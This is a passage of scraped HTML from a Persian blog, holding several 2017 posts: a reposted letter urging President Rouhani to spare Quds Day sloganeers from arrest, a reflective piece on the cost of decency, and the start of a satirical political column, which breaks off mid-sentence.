105)"><span style="background-color: rgb(255, 255, 0)"><font size="5" face="Arial" color="#0000ff">، یا&nbsp;</font></span></b><b style="color: rgb(42, 32, 17); font-size: 12px; line-height: normal; background-color: #E3FFFF"><font size="5" face="Arial" color="#0033cc">عنوان اصلی</font></b><span style="background-color: rgb(255, 255, 0)"><font size="5" face="Arial" color="#0000ff"><b style="line-height: normal; ">، به پیوند فوق اشاره</b></font></span></span><span style="background-color: rgb(255, 255, 0)"><font size="5" face="Arial" color="#0000ff"><b style="line-height: normal; "> کنید&nbsp; <span lang="fa"><br></span></b></font></span></b></b></strong></p><p style="line-height: 90px; margin-top: 0; margin-bottom: 0"><strong><b><b style="color: rgb(68, 68, 68); font-family: Tahoma; font-size: 12px; font-style: normal; font-variant: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(183, 152, 105)"><span style="background-color: rgb(255, 255, 0)"><font size="5" face="Arial" color="#0000ff"><b style="line-height: normal; "><span lang="fa"><br></span></b></font></span></b></b></strong></p><strong><b><b style="color: rgb(68, 68, 68); font-family: Tahoma; font-size: 12px; font-style: normal; font-variant: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(183, 152, 105)"><font size="5" face="Microsoft Sans Serif" color="#0033CC"> </font> </b> </b></strong><b> </b> <p></p><p align="justify"><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-IransansBold"><span><img src="http://images.khabaronline.ir/images/2017/6/position50/16-12-26-214499.jpg" class="thumbnail" height="591" width="558"><br></span></font></span></font></p><p align="justify"><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-IransansBold"><span><br></span></font></span></font></p><p align="justify"><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-IransansBold"><span> وبلاگ مهاجری، محمد ، خبرآنلاین :&nbsp; </span>آقای رئیس جمهور!&nbsp; باورم این است که شما هوشمندتر از آنید که در دام بیفتید. با اینکه دادستان محترم تهران طبق وظیفه ذاتی و قانونی اش دستور شناسایی هتاکان به شما را صادر کرده، پیشنهاد می کنم شما از طریق قانون و اگر راه قانونی ندارد ، از طریق خواهش و تمنا نگذارید کسی بازداشت شود.</font></span></font></p></div><div align="justify"><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-IransansBold"> </font></span></font></div><p align="justify"><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-IransansBold">در میان افرادی که روز قدس شعار می دادند هرچند ممکن است عده ای با برنامه ریزی قبلی آمده باشند، اما&nbsp; قطعا اکثرشان احساس تکلیف می کردند و به همین دلیل عذرشان موجه است.</font></span></font></p><div align="justify"><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-IransansBold"> </font></span></font></div><p align="justify"><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-IransansBold">آقای رئیس جمهور! این افراد ، آدمهای عادی جامعه اند. غالبا به حقوق شان هم آشنا نیستند. اگر دستگیر شوند بلد نیستند از خودشان دفاع کنند و ناگزیر به زندان محکوم می شوند. در دوران حبس زندگی شان مختل می شود. معیشت شان به هم می ریزد.خانواده شان نسبت به جمهوری اسلامی مسئله دار می شوند و دهها مشکل ریز و درشت دیگر به وجود می آید.</font></span></font></p><div align="justify"><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-IransansBold"> </font></span></font></div><p align="justify"><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-IransansBold">آقای روحانی! در طول مدت تبلیغات انتخابات، خبرگزاریها،روزنامه ها،سایتها و رسانه هایی که عمدتا با پول مردم اداره می شوند،حرفهای آدم های سیاسی را که صدها بدتر از شعارهای جمعه بود منتشر کردند. رسانه ملی مشابه همین ها را روی آنتن زنده برد. چرا دور برویم،چندنفر از حضرات نامزدها توهین و تهمتی نماند که نسبت به رئیس جمهور مستقر، فروگذار کرده باشند. شعارهای روز جمعه،ترجمان حرفهای همین عزیزان بود. کرور کرور آدمهایی که مارک ارزشمداری دارند همین حرفها را در تریبونهای متعدد بکار بردند و کک کسی نگزید.</font></span></font></p><div align="justify"><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-IransansBold"> </font></span></font></div><p align="justify"><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-IransansBold">آقای رئیس جمهور! نگذارید زور قانون به ضعیفها برسد. اجازه ندهید ضعیف کشی شود. جرم شعاردهندگان روز جمعه حداکثرش این است که در روزی که وحدت لازم بود، شعار تفرقه دادند. از بس در این یکی دو روز همه محکومشان کرده اند مغموم و غصه دار شده اند و&nbsp;&nbsp; متهمان اصلی دارند&nbsp; راست راست راه می روند و بشکن می زنند.</font></span></font></p><div align="justify"><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-IransansBold"> </font></span></font></div><p align="justify"><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-IransansBold">آقای روحانی! اگر زورتان به آن آدم گنده ها نمی رسد، این آدم ضعیف ها را نجات دهید. ممنون.</font></span></font></p><p align="justify"><br>&nbsp;<strong> &nbsp; <b> <font size="5" face="Latha"> <span style="text-decoration: overline; background-color: #FFFFCC"> <b style="color: rgb(68, 68, 68); font-family: Tahoma; font-style: normal; font-variant: normal; line-height: 56px; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(183, 152, 105)"> <span style="font-weight: 700; background-color: #F2F2F2"><font face="Arial" color="#0000FF">تهیه وَ تدوین: عـبـــد عـا صـی&nbsp; </font> </span> </b> </span></font> </b> </strong> </p><p align="justify"><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-IransansBold"><br></font></span></font></p><br> <b></b> <font style="font-size:8pt;"> <br> <font size="3"><b>برچسب ها: <a href="/post/tag/تبلیغات انتخابات">تبلیغات انتخابات</a>، <a href="/post/tag/رسانه ملی">رسانه ملی</a>، <a href="/post/tag/تهمت">تهمت</a>، <a href="/post/tag/زور قانون">زور قانون</a>، <a href="/post/tag/روز قدس و وحدت">روز قدس و وحدت</a>، <a href="/post/tag/جَوگیری">جَوگیری</a>،</b></font><br><br></font> </div> text/html 2017-06-25T07:05:33+01:00 1001SHAYADOBAYAD.mihanblog.com عـبـــد عـا صـی هزینه-ی آدم بودن ... http://1001SHAYADOBAYAD.mihanblog.com/post/3526 <div class="xpost2"><div style="float:right"></div> <div id="InPost_MihanblogShopAds" style="display:block;height:0px;width:100%;border:0px"></div> <div class="xpost2"> <div dir="RTL" style="line-height: 200%; margin: 0" align="right"> <b> <div class="xpost2" style="color: rgb(68, 68, 68); padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> <div class="xpost2" style="color: rgb(68, 68, 68); padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> <div class="xpost2"> <div class="xpost2" style="color: rgb(68, 68, 68); font-family: Tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> <div style="text-align: right" dir="rtl"> <b style="color: rgb(68, 68, 68); font-family: Tahoma; font-size: 12px; font-style: normal; font-variant: normal; letter-spacing: 3px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(183, 152, 105)"> <strong> <div class="xpost2"> <div class="xpost2" style="color: rgb(68, 68, 68); font-family: Tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> <p dir="rtl" style="line-height: 36px; margin-top: 0px; margin-bottom: 0px" align="justify"> &nbsp;</p> <p dir="rtl" style="line-height: 36px; margin-top: 0px; margin-bottom: 0px" align="justify"> <span style="color: #FFFFFF; font-family: Microsoft Sans Serif; font-size: large; font-weight: 700; background-color: #00B700"> &nbsp; بسم الله الرحمن الرحیم &nbsp;</span></p></div> </div> </strong></b> </div> </div> </div> </div> </div> </b> </div> <strong> <b style="color: rgb(68, 68, 68); font-family: Arial; font-style: normal; font-variant: normal; letter-spacing: 3px; line-height: 45pxl; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(183, 152, 105)"> </b> </strong><div dir="RTL" style="line-height: 200%; margin: 0" align="right"><strong> <p style="line-height: 90px; margin-top: 0; margin-bottom: 0"> <span style="letter-spacing: 3; vertical-align: bottom; background-color: #FFFFCC"> <font size="6" face="Arial"><font color="#00B700"><u> <span style="text-decoration: overline">&nbsp;هزینه-ی آدم</span></u></font><a href="http://shenasname.com/index5.php?code=2714" style="text-decoration: overline blink"><font color="#00B700"> بودن ...&nbsp; </font></a></font></span></p> <p style="line-height: 90px; margin-top: 0; margin-bottom: 0"> <b> <b style="color: rgb(68, 68, 68); font-family: Tahoma; font-size: 12px; font-style: normal; font-variant: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(183, 152, 105)"> <b style="color: rgb(42, 32, 17); font-size: 12px; line-height: normal; background-color: rgb(183, 152, 105)"> <span style="background-color: rgb(255, 255, 0)"> <font size="5" face="Arial" color="#0000ff">&nbsp;&nbsp;<span lang="fa">جهت مراجعه به&nbsp;</span></font></span></b><span lang="fa"><b style="color: rgb(42, 32, 17); font-size: 12px; line-height: normal; background-color: #E3FFFF"><font size="5" face="Arial" color="#0033cc">مرجع متن</font></b><b style="color: rgb(42, 32, 17); font-size: 12px; line-height: normal; background-color: rgb(183, 152, 105)"><span style="background-color: rgb(255, 255, 0)"><font size="5" face="Arial" color="#0000ff">، یا&nbsp;</font></span></b><b style="color: rgb(42, 32, 17); font-size: 12px; line-height: normal; background-color: #E3FFFF"><font size="5" face="Arial" color="#0033cc">عنوان اصلی</font></b><span style="background-color: rgb(255, 255, 0)"><font size="5" face="Arial" color="#0000ff"><b style="line-height: normal; ">، به پیوند فوق اشاره</b></font></span></span><span style="background-color: rgb(255, 255, 0)"><font size="5" face="Arial" color="#0000ff"><b style="line-height: normal; "> کنید <span lang="fa">&nbsp;</span></b></font></span></b></b></p><b><b style="color: rgb(68, 68, 68); font-family: Tahoma; font-size: 12px; font-style: normal; font-variant: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(183, 152, 105)"><font size="5" face="Microsoft Sans Serif" color="#0033CC"> </font> </b> </b></strong><div dir="RTL" style="line-height: 200%; margin: 0" align="justify"><strong><b> <p style="line-height: 55px; margin-top: 0; margin-bottom: 0">&nbsp; <br><img src="http://s8.picofile.com/file/8298791218/AADAM_BUDAN_3.jpg" alt="http://s8.picofile.com/file/8298791218/AADAM_BUDAN_3.jpg" class="shrinkToFit" height="474" width="474"></p><p style="line-height: 55px; margin-top: 0; margin-bottom: 0"><br></p><p style="line-height: 55px; margin-top: 0; margin-bottom: 0"><img src="http://s9.picofile.com/file/8298791368/AADAM_BUDAN_1.jpg" alt="http://s9.picofile.com/file/8298791368/AADAM_BUDAN_1.jpg" class="shrinkToFit" height="470" width="472"></p><br><br></b></strong><strong><b><img src="http://s8.picofile.com/file/8298791484/AADAM_BUDAN_2.jpg" alt="http://s8.picofile.com/file/8298791484/AADAM_BUDAN_2.jpg" height="255" width="475"></b></strong><strong><b><p style="line-height: 55px; margin-top: 0; margin-bottom: 0"><font size="4" face="Microsoft Sans Serif" color="#0000FF"><b style="font-style: normal; font-variant: 56px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #E3FFFF"><br></b></font></p><p style="line-height: 55px; margin-top: 0; margin-bottom: 0"><font size="4" face="Microsoft Sans Serif" color="#0000FF"><b style="font-style: normal; font-variant: 56px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #E3FFFF"><br></b></font></p><p style="line-height: 55px; margin-top: 0; margin-bottom: 0"><font size="4" face="Microsoft Sans Serif" color="#0000FF"><b style="font-style: normal; font-variant: 56px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #E3FFFF"><br></b></font></p><p style="line-height: 55px; margin-top: 0; margin-bottom: 0"><font size="4" face="Microsoft Sans Serif" color="#0000FF"><b style="font-style: normal; font-variant: 56px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #E3FFFF">&nbsp; کسی که دربارۀ پول و دستمزدش زیاد اصرار نمی کند و خیال می کند دیگران انصافدارند، احمق نیست، <br></b></font></p><p style="line-height: 55px; margin-top: 0; margin-bottom: 0"><font size="4" face="Microsoft Sans Serif" color="#0000FF"><b style="font-style: normal; font-variant: 56px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #E3FFFF"><br></b></font></p><p style="line-height: 55px; margin-top: 0; margin-bottom: 0"><font size="4" face="Microsoft Sans Serif" color="#0000FF"><b style="font-style: normal; font-variant: 56px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #E3FFFF">مناعت طبع دارد. <br> </b></font></p><p style="line-height: 55px; margin-top: 0; margin-bottom: 0"><font size="4" face="Microsoft Sans Serif" color="#0000FF"><b style="font-style: normal; font-variant: 56px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #E3FFFF"><br></b></font></p><p style="line-height: 55px; margin-top: 0; margin-bottom: 0"><font size="4" face="Microsoft Sans Serif" color="#0000FF"><b style="font-style: normal; font-variant: 56px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #E3FFFF">&nbsp;کسی که به موقع می آید و برای با کلاس بودن، عده ای را منتظر نمی گذارد، احمق نیست، منظم و <br></b></font></p><p style="line-height: 55px; margin-top: 0; margin-bottom: 0"><font size="4" face="Microsoft Sans Serif" color="#0000FF"><b style="font-style: normal; font-variant: 56px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #E3FFFF"><br></b></font></p><p style="line-height: 55px; margin-top: 0; margin-bottom: 0"><font size="4" face="Microsoft Sans Serif" color="#0000FF"><b style="font-style: normal; font-variant: 56px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #E3FFFF">محترم است. <br></b></font></p><p style="line-height: 55px; margin-top: 0; margin-bottom: 0"><font size="4" face="Microsoft Sans Serif" color="#0000FF"><b style="font-style: normal; font-variant: 56px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #E3FFFF"><br></b></font></p><p style="line-height: 55px; margin-top: 0; margin-bottom: 0"><font size="4" face="Microsoft Sans Serif" color="#0000FF"><b style="font-style: normal; font-variant: 56px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #E3FFFF">&nbsp; کسی که به دیگران اعتماد می کند و آنها را به خانه-اش راه می دهد وُ صمیمانه وُ دوستانه رفتار <br></b></font></p><p style="line-height: 55px; margin-top: 0; margin-bottom: 0"><font size="4" face="Microsoft Sans Serif" color="#0000FF"><b style="font-style: normal; font-variant: 56px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #E3FFFF"><br></b></font></p><p style="line-height: 55px; margin-top: 0; margin-bottom: 0"><font size="4" face="Microsoft Sans Serif" color="#0000FF"><b style="font-style: normal; font-variant: 56px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #E3FFFF">میکند، احمق نیست، متواضع و مهربان است. <br></b></font></p><p style="line-height: 55px; margin-top: 0; margin-bottom: 0"><font size="4" face="Microsoft Sans Serif" color="#0000FF"><b style="font-style: normal; font-variant: 56px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #E3FFFF"><br></b></font></p><p style="line-height: 55px; margin-top: 0; margin-bottom: 0"><font size="4" face="Microsoft Sans Serif" color="#0000FF"><b style="font-style: normal; font-variant: 56px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #E3FFFF">&nbsp; کسی که برای حل مشکلات دیگران به آنها پول قرض می دهد یا ضامن وام آنها می شود وَ به دروغ <br></b></font></p><p style="line-height: 55px; margin-top: 0; margin-bottom: 0"><font size="4" face="Microsoft Sans Serif" color="#0000FF"><b style="font-style: normal; font-variant: 56px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #E3FFFF"><br></b></font></p><p style="line-height: 55px; margin-top: 0; margin-bottom: 0"><font size="4" face="Microsoft Sans Serif" color="#0000FF"><b style="font-style: normal; font-variant: 56px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #E3FFFF">نمی گوید که ندارم و گرفتارم، احمق نیست. کریم و جوانمرد است. <br></b></font></p><p style="line-height: 55px; margin-top: 0; margin-bottom: 0"><font size="4" face="Microsoft Sans Serif" color="#0000FF"><b style="font-style: normal; font-variant: 56px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #E3FFFF"><br></b></font></p><p style="line-height: 55px; margin-top: 0; margin-bottom: 0"><font size="4" face="Microsoft Sans Serif" color="#0000FF"><b style="font-style: normal; font-variant: 56px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #E3FFFF">&nbsp; کسی که از معایب وُ کاستی های دیگران، دَرمیگذرد وَ بدی-ها را نادیده می گیرد، احمق نیست؛ شریف <br></b></font></p><p style="line-height: 55px; margin-top: 0; margin-bottom: 0"><font size="4" face="Microsoft Sans Serif" color="#0000FF"><b style="font-style: normal; font-variant: 56px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #E3FFFF"><br></b></font></p><p style="line-height: 55px; margin-top: 0; margin-bottom: 0"><font size="4" face="Microsoft Sans Serif" color="#0000FF"><b style="font-style: normal; font-variant: 56px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #E3FFFF">است. <br></b></font></p><p style="line-height: 55px; margin-top: 0; margin-bottom: 0"><font size="4" face="Microsoft Sans Serif" color="#0000FF"><b style="font-style: normal; font-variant: 56px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #E3FFFF"><br></b></font></p><p style="line-height: 55px; margin-top: 0; margin-bottom: 0"><font size="4" face="Microsoft Sans Serif" color="#0000FF"><b style="font-style: normal; font-variant: 56px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #E3FFFF">&nbsp; كسی كه در مقابل بی ادبی وُ بی شخصیتی دیگران با تواضع و محترمانه صحبت می كند وَ مانند آنها <br></b></font></p><p style="line-height: 55px; margin-top: 0; margin-bottom: 0"><font size="4" face="Microsoft Sans Serif" color="#0000FF"><b style="font-style: normal; font-variant: 56px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #E3FFFF"><br></b></font></p><p style="line-height: 55px; margin-top: 0; margin-bottom: 0"><font size="4" face="Microsoft Sans Serif" color="#0000FF"><b style="font-style: normal; font-variant: 56px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #E3FFFF">توهین وُ بَد-دهنی نمی كند، احمق نیست؛ مودب وُ باشخصیت است ... <br></b></font></p><p style="line-height: 55px; margin-top: 0; margin-bottom: 0"><font size="4" face="Microsoft Sans Serif" color="#0000FF"><b style="font-style: normal; font-variant: 56px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #E3FFFF"><br></b></font></p><p style="line-height: 55px; margin-top: 0; margin-bottom: 0"><font size="4" face="Microsoft Sans Serif" color="#0000FF"><b style="font-style: normal; font-variant: 56px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #E3FFFF">&nbsp; «انسان بودن هزینه سنگینی دارد»... </b></font></p> <p style="line-height: 55px; margin-top: 0; margin-bottom: 0"> <font size="4" face="Microsoft Sans Serif" color="#0000FF"><b style="font-style: normal; font-variant: 56px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #E3FFFF"> <span style="vertical-align: bottom; letter-spacing:1pt"> &nbsp;</span></b></font></p> <div style="text-align: justyfy" dir="rtl"> <div style="text-align: right" dir="rtl"> <font size="5" face="Latha"> <span style="text-decoration: overline; background-color: #FFFFCC"> <b style="color: rgb(68, 68, 68); font-family: Tahoma; font-style: normal; font-variant: normal; line-height: 56px; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(183, 152, 105)"> <p style="line-height: 200%; margin-top: 0; margin-bottom: 0" dir="rtl" align="right"> <font color="#520088"> <span style="font-weight: 700; background-color: #F2F2F2"> <font face="Arial" color="#0000FF">&nbsp;</font></span></font><span style="font-weight: 700; background-color: #F2F2F2"><font color="#0000FF"> </font><font face="Arial" color="#0000FF">تهیه وَ تدوین: عـبـــد عـا صـی </font> </span></p> </b> </span></font> <b style="color: rgb(68, 68, 68); font-family: Tahoma; font-size: 12px; font-style: normal; font-variant: normal; letter-spacing: 3px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(183, 152, 105)"> <blockquote> <div class="xpost2" style="color: rgb(68, 68, 68); padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> <div class="xpost2" style="color: rgb(68, 68, 68); padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> <b> <div class="xpost2" style="color: rgb(68, 68, 68); padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> <div class="xpost2" style="color: rgb(68, 68, 68); padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> <div class="xpost2" style="color: rgb(68, 68, 68); padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> <div class="xpost2" style="color: rgb(68, 68, 68); padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> &nbsp;</div> </div> </div> </div> </b> </div> </div> </blockquote> </b></div><b style="color: rgb(68, 68, 68); font-family: Tahoma; font-size: 12px; font-style: normal; font-variant: normal; letter-spacing: 3px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(183, 152, 105)"> </b></div><b style="color: rgb(68, 68, 68); font-family: Tahoma; font-size: 12px; font-style: normal; font-variant: normal; letter-spacing: 3px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(183, 152, 105)"> </b> </b> </strong> </div></div></div> <b></b> <font style="font-size:8pt;"> <br> <font size="3">برچسب ها: <a href="/post/tag/آدم بودن">آدم بودن</a>، <a href="/post/tag/مناعت طبع">مناعت طبع</a>، <a href="/post/tag/متواضع">متواضع</a>، <a href="/post/tag/مهربان">مهربان</a>، <a href="/post/tag/جوانمرد">جوانمرد</a>، <a href="/post/tag/شریف">شریف</a>، <a href="/post/tag/باشخصیت">باشخصیت</a>،</font><br><br><br></font> </div> text/html 2017-06-24T13:02:28+01:00 1001SHAYADOBAYAD.mihanblog.com عـبـــد عـا صـی مخالفان رئیس‌جمهور چشم خوردند! http://1001SHAYADOBAYAD.mihanblog.com/post/3525 <div class="xpost"><div class="xpost2"><div style="float:right"></div> <div id="InPost_MihanblogShopAds" style="display:block;height:0px;width:100%;border:0px"></div><h2><br></h2><h2><a href="http://www.khabaronline.ir/detail/679659/weblog/pourmohebbi"><font color="#CC0000"><span style="background-color: rgb(204, 204, 204);"><font size="6" face="arial,helvetica,sans-serif">&nbsp;&nbsp;&nbsp; مخالفان رئیس‌جمهور چشم خوردند!&nbsp;&nbsp;&nbsp; </font></span></font><br></a></h2><h2><br></h2> <div class="newsPhoto"> <img src="http://images.khabaronline.ir/images/2017/6/position50/17-1-31-82157photo_2017-01-31_08-26-09.jpg" class="thumbnail" height="434" width="434"> </div> <div class="leadCont"> <p align="justify"> <font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-IransansBold"><span>وبلاگ پورمحبی، فرزین ، خبرآنلاین : &nbsp; <br></span></font></span></font></p><div align="justify"><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-IransansBold"> </font></span></font></div></div><div align="justify"><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-IransansBold"> </font></span></font></div><div class=" clear" align="justify"> </div><div align="justify"><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-IransansBold"> </font></span></font></div><p align="justify"><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-IransansBold"><span style="background-color: rgb(255, 255, 204);">انگار همین دیروز بود که از دندان رو جگر گذاشتن آنهایی که دست کاندیدای شان از رسیدن بر خرمای نخیل کوتاه مانده بود کلی تشکر شد و بخاطر اینکه نگفتند: «رای ما را پس بده» قربون صدقه شان رفته شد. </span>یکیش همین رسانه ملی که برای شان کلی تره خرد کرد و منتش را سر آنهایی گذاشت که به روحانی رای داده بودند و ایضا بقیه دستگاه ها ... <br>&nbsp;البته اگر تشکر ما هم اهمیتی داشته باشد از همین تریبون دست تک تک شان را می فشاریم و از اینکه در آنموقع به قانون تمکین کردند بشدت ازشان تقدیر می کنیم. چون این روزها قانونی عمل کردن نوبره و باید کسی که خیلی به اختیار خودش نیست را حلوا حلوا کرد و بر سر گذاشت! <br><font color="#CC0000">&nbsp;اما گویا سق مان سیاه و چشم مان شور بود؛ چون چشم خوردند!&nbsp; </font><br>بله، انگار همین دیروز بود، نه بابا دقیقا خود همین دیروز بود که بعضی از همان صبوران گرامی - زیر «بعضی» خودتان خط بکشید- <font color="#CC0000"><span style="background-color: rgb(204, 204, 204);"> بند دلشان یکهو پاره شد و بغض فرو خورده یک ماهه شان ترکیده شد و در این گیر و دار، دشمن عوضی 